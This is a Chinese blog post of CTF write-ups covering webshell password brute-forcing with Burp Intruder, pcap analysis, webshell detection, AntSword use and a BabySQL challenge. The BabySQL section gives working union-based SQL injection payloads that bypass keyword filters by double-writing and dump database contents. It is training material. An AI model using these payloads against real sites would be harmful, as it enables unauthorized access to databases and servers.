CTF刷题04

网站被黑

访问题目地址
在这里插入图片描述
用御剑扫一下,发现了一个shell.php
在这里插入图片描述
访问shell.php,随便输入一个,然后用burpsuite抓包
在这里插入图片描述
右键,点击Send to Intruder
在这里插入图片描述
Payload type:选择Simple list,Add from list选择Passwords,然后点击右上方的Start attack
在这里插入图片描述
发现当payload为hack,length为1110
在这里插入图片描述
提交hack,得到flag
在这里插入图片描述

数据包中的线索

题目描述:公安机关近期截获到某网络犯罪团伙在线交流的数据包,但无法分析出具体的交流内容,聪明的你能帮公安机关找到线索吗? 注意:得到的 flag 请包上 flag{} 提交
下载附件,用wireshark打开。
在这里插入图片描述追踪http流,发现了一段密文,密文以=结尾,猜想应该是Base64
在这里插入图片描述
进行Base64解码,发现都是乱码。
在这里插入图片描述换个Base64解密网站,继续进行解密,发现是转存为了jpg文件,怪不得会乱码。
在这里插入图片描述下载图片,flag就出来了
在这里插入图片描述

后门查杀

题目描述:
小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?(Webshell中的密码(md5)即为答案)。 注意:得到的 flag 请包上 flag{} 提交

将下载的附件解压,然后使用D盾扫描,发现了两个可疑的文件。
在这里插入图片描述查看一下这两个文件,在其中一个文件中发现了flag。
在这里插入图片描述

[极客大挑战 2019]Knife

在这里插入图片描述
使用蚁剑进行操作,一句话木马中给出密码是Syc,进行添加。

在这里插入图片描述点击进入添加的地址

在这里插入图片描述查看目录,看到flag文件
在这里插入图片描述点击flag文件,得到flag。
在这里插入图片描述

[极客大挑战 2019]BabySQL

在这里插入图片描述1. 万能密码注入
尝试万能密码 1' or 1=1 #,报错语句中没有看到or,or被过滤
在这里插入图片描述尝试双写or:1' oorr 1=1 #,没有报错,应该是双写绕过
在这里插入图片描述2. 查字段
构造payload:

?username=admin&password=pwd %27 union select 1 %23

报错提示中只保留了 1# ,说明union和select都被过滤了

在这里插入图片描述双写union和select,继续注入

?username=admin&password=123456 %27 ununionion seselectlect 1 %23

注入成功,但报错语句告诉我们列数不对
在这里插入图片描述
继续构造payload:

?username=admin&password=123456 %27 ununionion seselectlect 1,2,3 %23

发现注入成功,字段为3

在这里插入图片描述3. 爆数据库

Payload:
?username=admin&password=123456%20%27 ununionion seselectlect 1,2,database() %23

获取到当前库名为geek
在这里插入图片描述
查看所有库名

Payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

看到了一个名为ctf的数据库,flag应该在这
在这里插入图片描述

  1. 查表
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23

发现了一个名为Flag的表
在这里插入图片描述

  1. 查字段名
    构造payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23

在这里插入图片描述

  1. 获取数据
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

得到flag
在这里插入图片描述

posted @ 2020-10-11 11:11  atkx  阅读(282)  评论(0编辑  收藏  举报